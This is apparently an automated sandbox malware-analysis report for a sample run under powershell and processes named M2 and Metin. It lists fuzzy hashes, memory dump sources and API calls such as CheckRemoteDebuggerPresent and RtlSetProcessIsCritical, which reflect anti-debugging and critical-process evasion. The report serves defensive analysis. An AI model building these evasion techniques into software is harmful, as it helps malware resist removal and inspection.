                                                                                                                    • Instruction ID: 7d6f44c55e9566303441bb2351a22858f2275608ff65ed21fe7c39d3b87563b6
                                                                                                                    • Opcode Fuzzy Hash: 51c0b5aabacade3e3f8f8534120455697c3b9bdda41f363032bd47c0c64428b0
                                                                                                                    • Instruction Fuzzy Hash: A4F0E53A300615CFDB00DB68D944BA9B7EAEFC8651B094194E40ACB324DF70CC128B90
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 15db6053443051009c119eac5d834193f59fb1ddda752c45cf7ac72fa81da4d4
                                                                                                                    • Instruction ID: d2975b132ee21c4b50fb2d100e529beb5fd3cff9e03dfe25085bd7f6a733da10
                                                                                                                    • Opcode Fuzzy Hash: 15db6053443051009c119eac5d834193f59fb1ddda752c45cf7ac72fa81da4d4
                                                                                                                    • Instruction Fuzzy Hash: 5FF0EC35609B906BC317D32D541085F7FE69DC3560719449ED055CB252CEA5CC06C7A2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9e9fedb9105f0401d63d5bd122cb0ea9c1661ecd6d5c6dafeb141c73bd0dde69
                                                                                                                    • Instruction ID: 4b0305101ca17a3e3487d88116bdd90c535ab46c0f3955848bc005b05e629dd6
                                                                                                                    • Opcode Fuzzy Hash: 9e9fedb9105f0401d63d5bd122cb0ea9c1661ecd6d5c6dafeb141c73bd0dde69
                                                                                                                    • Instruction Fuzzy Hash: 6AE0E5353002148F8610DB1ED498D2AB7FAEFCEA2572A40A9F589CB725DA71EC01CB90
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 341caf1aa9a2dbe468a924ceaca76ec5d44b74127b495c2ffc7235d2292cdb1b
                                                                                                                    • Instruction ID: a722e4704c8fb309b94ad3d14600be8804d3be3380df7e16716cebc73def6641
                                                                                                                    • Opcode Fuzzy Hash: 341caf1aa9a2dbe468a924ceaca76ec5d44b74127b495c2ffc7235d2292cdb1b
                                                                                                                    • Instruction Fuzzy Hash: E5E0DF2270A3D54B8722E2B965205BA6FEA4EC6264F1D01FFC949DF243CC808C25C3F2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5e4aa9fdc4b945fe61c745a4c2dc31822d4d9b48a33c99ac265b30dd5345ee72
                                                                                                                    • Instruction ID: bee56012b08eec3b4d7a2bd87bed5d0b0d0c15fe149c981c7a64f30eb4a38fb0
                                                                                                                    • Opcode Fuzzy Hash: 5e4aa9fdc4b945fe61c745a4c2dc31822d4d9b48a33c99ac265b30dd5345ee72
                                                                                                                    • Instruction Fuzzy Hash: C4F0A73930D7918FCB06A77894581AD6FB29BC1214F05006ED549CB243CE7548098395
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 31abf33f31d93159f8032af9344f37f5b1884f27596ad5ec4cc30553545d616b
                                                                                                                    • Instruction ID: cfaab8ebf064f3ec05780fdd1a8a8947e8c5bdb570ef541d5fe9215b9318b3da
                                                                                                                    • Opcode Fuzzy Hash: 31abf33f31d93159f8032af9344f37f5b1884f27596ad5ec4cc30553545d616b
                                                                                                                    • Instruction Fuzzy Hash: 1DE09B71704550578B05C65CD8544F9FF75DFC9221F04847EE946A7240CE729517D7E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f0ba34ccf07c8427bef7960419423d5357b5e18a68180ad96090dff6c5ee2ca4
                                                                                                                    • Instruction ID: 2f0a898d060313d66463483bf55c83eedd1b21a9274b4652e40453a3360801a8
                                                                                                                    • Opcode Fuzzy Hash: f0ba34ccf07c8427bef7960419423d5357b5e18a68180ad96090dff6c5ee2ca4
                                                                                                                    • Instruction Fuzzy Hash: 97E0DF353007002B8268F26EBC9092FB6EEFEC55A0394C83DC14F9BA20DEB06C0197B1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bd562dae44f806e6436c49735a0a575786edfb5554074665de6fc30ba9f6b00b
                                                                                                                    • Instruction ID: 43bd7ed76e01dde8c5eda1eefe68d7990aa6dd306e2da2d35ac0bf4b63f0e4f0
                                                                                                                    • Opcode Fuzzy Hash: bd562dae44f806e6436c49735a0a575786edfb5554074665de6fc30ba9f6b00b
                                                                                                                    • Instruction Fuzzy Hash: 88F03970A043048BD360EBB8D49839ABBE9FB44310F044429D10EC7340DB35A8808B90
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e8e7bc3d521e7705a6468d01c6732c0b75b08e1fc3c9ebf0bda122e3852739f1
                                                                                                                    • Instruction ID: a34cb0adc108b8cca1707a3c8869ac015d3ecee0e245427db9e65df59dfec70f
                                                                                                                    • Opcode Fuzzy Hash: e8e7bc3d521e7705a6468d01c6732c0b75b08e1fc3c9ebf0bda122e3852739f1
                                                                                                                    • Instruction Fuzzy Hash: D4E0CD2674E3D01B4B17C13D64204A66FA38BD751131D84FED448CF342CC928C068365
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9bb05cb654a0f58fb7042b85e8d104b9d9decb8e4259e57f5a2d7bf6937c31ce
                                                                                                                    • Instruction ID: 10fde6fa9a9fb76e66eb90e8d52fec8a4a1b5e517b85483db681dfc90ee8a19c
                                                                                                                    • Opcode Fuzzy Hash: 9bb05cb654a0f58fb7042b85e8d104b9d9decb8e4259e57f5a2d7bf6937c31ce
                                                                                                                    • Instruction Fuzzy Hash: 02E02639308751C7CB087BB8A40C2AE7A9AEBC4724F04002EE60A87342CF78580183D9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 620e38686fde35e9a2b1e5b4f71b0851506cf2c696ddb7ddc0b12eaf9fcfac95
                                                                                                                    • Instruction ID: b65d2e877f1a0b0ea07ceb73c02748933c5764f7d91c5081de85e8a39fa841d8
                                                                                                                    • Opcode Fuzzy Hash: 620e38686fde35e9a2b1e5b4f71b0851506cf2c696ddb7ddc0b12eaf9fcfac95
                                                                                                                    • Instruction Fuzzy Hash: 2FD05E16B10365071664F0FA695067BA1CF8AC8AA1F0D013A9A0DDB341ED40CC2183F5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b6237de5d3b40be6824a9432a19c0d100d89a3227a030f538878058e4a1c521b
                                                                                                                    • Instruction ID: f0fbce56f246a28519b4b3090ee65d77b94696b4067eea8ee1e284efeeb1215c
                                                                                                                    • Opcode Fuzzy Hash: b6237de5d3b40be6824a9432a19c0d100d89a3227a030f538878058e4a1c521b
                                                                                                                    • Instruction Fuzzy Hash: 07E0C236700B25578216E65EA81096F77EBEEC5A71318842EE06ACB300DFA1DC018BE5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                    • Instruction ID: 2073d41450dc1c3d161399e2542406d3acf72aa43367f6865439adb128dfe1a6
                                                                                                                    • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                    • Instruction Fuzzy Hash: 9EE08631B00014978B08D659D8144E9F7B9DBCC221F04847AD90AA7340DE32591687E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 52a49be4b126daa14f31cdd2ae700377e3539e476f625baf0572724b6d0007e5
                                                                                                                    • Instruction ID: 45152711e8a4ba4edfbbb88783487b875188919003040c4cadd28a19f93c0ef5
                                                                                                                    • Opcode Fuzzy Hash: 52a49be4b126daa14f31cdd2ae700377e3539e476f625baf0572724b6d0007e5
                                                                                                                    • Instruction Fuzzy Hash: B5E086357082919F8342736CA91946D7FE1FBD5261308007EE58DCB292D9558C068791
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6ec779ed1e47289158c0f43e637870a9c36311d02567d247fe9e669f012385cf
                                                                                                                    • Instruction ID: f287d902b3dba7c1235260a57258a22fca7a1cdf65b4878024c1c689116eb064
                                                                                                                    • Opcode Fuzzy Hash: 6ec779ed1e47289158c0f43e637870a9c36311d02567d247fe9e669f012385cf
                                                                                                                    • Instruction Fuzzy Hash: 0AE0DF30A09286DBCB08EBBCD00646EBFB2EB06214F0006ADED4997242C672045ACF81
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2b403ca1ec9b98538be6611cb5930a560877518a9123560a8693691e996468ed
                                                                                                                    • Instruction ID: 96bf21aab42401863b14d315acd921c6c4537bed3884db4f7f7079b24f4e210b
                                                                                                                    • Opcode Fuzzy Hash: 2b403ca1ec9b98538be6611cb5930a560877518a9123560a8693691e996468ed
                                                                                                                    • Instruction Fuzzy Hash: 35E04F71A0A046CFCB0DFBA4D4594BD7F30EB05311F40489DE95753092DEB10546CB80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 24b259613d324c7f1249f7f44f7a358940ce5947d4d666a586641a57b1b21cc0
                                                                                                                    • Instruction ID: eef62e3fba3ceeb574402d65f1fc5224bc38e9bf61ac2bf8dd9dbfb82982c3ca
                                                                                                                    • Opcode Fuzzy Hash: 24b259613d324c7f1249f7f44f7a358940ce5947d4d666a586641a57b1b21cc0
                                                                                                                    • Instruction Fuzzy Hash: FED0A7363041129B4245735DB40D45E77E9E7C9662300003EE60DC7340DE219C0183E4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3333541f41c9d54f6488fa70daf948d1e7b6a5e278d3ff631acd039d942dc30a
                                                                                                                    • Instruction ID: 5207708a378b95bba01cc2011b38e6a1ca970deb27aa6c14459b7b3413af71a6
                                                                                                                    • Opcode Fuzzy Hash: 3333541f41c9d54f6488fa70daf948d1e7b6a5e278d3ff631acd039d942dc30a
                                                                                                                    • Instruction Fuzzy Hash: 65E0D8709001465AC791CF7CC440095FFA09B06134B1486DE84558B255D6335103CBC0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                    • Instruction ID: 23106f1cbb138c48891c5f183be1df078fc51adce6230034e6d0a27eb3818a06
                                                                                                                    • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                    • Instruction Fuzzy Hash: 54D067B0D042099F8780EFADC94156EFBF4EB58204F6485AA8919E7301E7329A128FD1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 21236a75e8d654f31a5fa8ef666d0db2297449df5069a2ec1dc32968684eafd0
                                                                                                                    • Instruction ID: 0e891d9f81c1186a73db9d8b29607e3a0d855dbec2f88ae48496690490e37756
                                                                                                                    • Opcode Fuzzy Hash: 21236a75e8d654f31a5fa8ef666d0db2297449df5069a2ec1dc32968684eafd0
                                                                                                                    • Instruction Fuzzy Hash: 66D0673180810ACBCB0CFBA4E85A4BEBB74FB14311F40416DD91B53191EA311A5ACAC1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d5d0f5a7bf7cfba6359c8dc79b9689961541ff9ded9ef0c97ad22a0629d1813f
                                                                                                                    • Instruction ID: 1d169cd11bf3443600ba139c639cf64dede52e0893905b1fa019020adc09eb4d
                                                                                                                    • Opcode Fuzzy Hash: d5d0f5a7bf7cfba6359c8dc79b9689961541ff9ded9ef0c97ad22a0629d1813f
                                                                                                                    • Instruction Fuzzy Hash: 00D01734A0820ACBCB08EFA8E44686EBBB5EB44200F004169EE0993340EA306851CBC1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 45b4c60cb4d3d0ffdcf6dd13e6cd345bfbd631602a6ffa056f3a9563dc2416d8
                                                                                                                    • Instruction ID: e3d6263ccd15274d694d56400c0e983f95a20c9f2e8e94724e2d68b310ac61bb
                                                                                                                    • Opcode Fuzzy Hash: 45b4c60cb4d3d0ffdcf6dd13e6cd345bfbd631602a6ffa056f3a9563dc2416d8
                                                                                                                    • Instruction Fuzzy Hash: 40C09B341C5344DFC7159FBAE48485D7F61BE4121571405EDE41B4A767CA73D445CF10
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f94b0251959362edcbb1a13bc6a379834ab6b5e0365513b27d5d9545037d3d12
                                                                                                                    • Instruction ID: 3801c062b5832e977a290be419f8f09e2cb45e1c7b717d0e51bb4cf1bfb566f9
                                                                                                                    • Opcode Fuzzy Hash: f94b0251959362edcbb1a13bc6a379834ab6b5e0365513b27d5d9545037d3d12
                                                                                                                    • Instruction Fuzzy Hash: EBB09230084708CFC208AF7AA40482C7729BA4020578008E9E42E0A3A68E36E844CA84
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a4ea52e127d4b350244cd453f8892df40fedf2886f26df0ae9d0c1781e796c72
                                                                                                                    • Instruction ID: a55b974ff32e733e47f46d10e94c4ca8af551fb832e858e2f3e4f2669b75e06c
                                                                                                                    • Opcode Fuzzy Hash: a4ea52e127d4b350244cd453f8892df40fedf2886f26df0ae9d0c1781e796c72
                                                                                                                    • Instruction Fuzzy Hash: 99B09232A202208BAF088E32818955A7B72EB863003128559A14282010CA34044A9640
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1325661745.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_8ee0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6dd073a2d4a9f91a86b0165c33b60c4394a094ebbc9b90561db22a1cef301c23
                                                                                                                    • Instruction ID: a612c6f95c9003281c64c6ce17033827d2014ba5ba33353997dc65c3d8c80e6c
                                                                                                                    • Opcode Fuzzy Hash: 6dd073a2d4a9f91a86b0165c33b60c4394a094ebbc9b90561db22a1cef301c23
                                                                                                                    • Instruction Fuzzy Hash: 8CE13A71B006059FDB14DF69C844BAEB7F1FF44309F14866DE40ADB2A1EB71E9468B90
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 9gm_$p$p$p$p
                                                                                                                    • API String ID: 0-750752749

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:13.8%
                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:16
                                                                                                                    Total number of Limit Nodes:0
                                                                                                                    execution_graph 14939 24c0871 14943 24c08c8 14939->14943 14948 24c08d8 14939->14948 14940 24c0889 14944 24c08fa 14943->14944 14953 24c0ce8 14944->14953 14957 24c0ce0 14944->14957 14945 24c093e 14945->14940 14949 24c08fa 14948->14949 14951 24c0ce8 GetConsoleWindow 14949->14951 14952 24c0ce0 GetConsoleWindow 14949->14952 14950 24c093e 14950->14940 14951->14950 14952->14950 14954 24c0d26 GetConsoleWindow 14953->14954 14956 24c0d56 14954->14956 14956->14945 14958 24c0d26 GetConsoleWindow 14957->14958 14960 24c0d56 14958->14960 14960->14945

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 892 24c0ce0-24c0d54 GetConsoleWindow 895 24c0d5d-24c0d82 892->895 896 24c0d56-24c0d5c 892->896 896->895
                                                                                                                    APIs
                                                                                                                    • GetConsoleWindow.KERNELBASE ref: 024C0D47
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2541495077.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_24c0000_M2.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ConsoleWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2863861424-0

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 900 24c0ce8-24c0d54 GetConsoleWindow 903 24c0d5d-24c0d82 900->903 904 24c0d56-24c0d5c 900->904 904->903
                                                                                                                    APIs
                                                                                                                    • GetConsoleWindow.KERNELBASE ref: 024C0D47
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2541495077.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_24c0000_M2.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ConsoleWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2863861424-0

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:19.7%
                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                    Signature Coverage:33.3%
                                                                                                                    Total number of Nodes:9
                                                                                                                    Total number of Limit Nodes:0

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 350 7ff7c1417585-7ff7c1417a6d CheckRemoteDebuggerPresent 354 7ff7c1417a6f 350->354 355 7ff7c1417a75-7ff7c1417ab8 350->355 354->355
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.2565009591.00007FF7C1410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1410000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_7ff7c1410000_Metin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CheckDebuggerPresentRemote
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3662101638-0

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.2565009591.00007FF7C1410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1410000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_7ff7c1410000_Metin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalProcess
                                                                                                                    • String ID: O_^
                                                                                                                    • API String ID: 2695349919-897003143

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 232 7ff7c141913d-7ff7c1419220 RtlSetProcessIsCritical 236 7ff7c1419228-7ff7c141925d 232->236 237 7ff7c1419222 232->237 237->236
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.2565009591.00007FF7C1410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1410000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_7ff7c1410000_Metin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2695349919-0

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 343 7ff7c14179b1-7ff7c1417a6d CheckRemoteDebuggerPresent 347 7ff7c1417a6f 343->347 348 7ff7c1417a75-7ff7c1417ab8 343->348 347->348
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.2565009591.00007FF7C1410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1410000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_7ff7c1410000_Metin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CheckDebuggerPresentRemote
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3662101638-0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.1474148632.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ff7c1430000_powershell.jbxd
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.1475216339.00007FF7C1500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1500000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
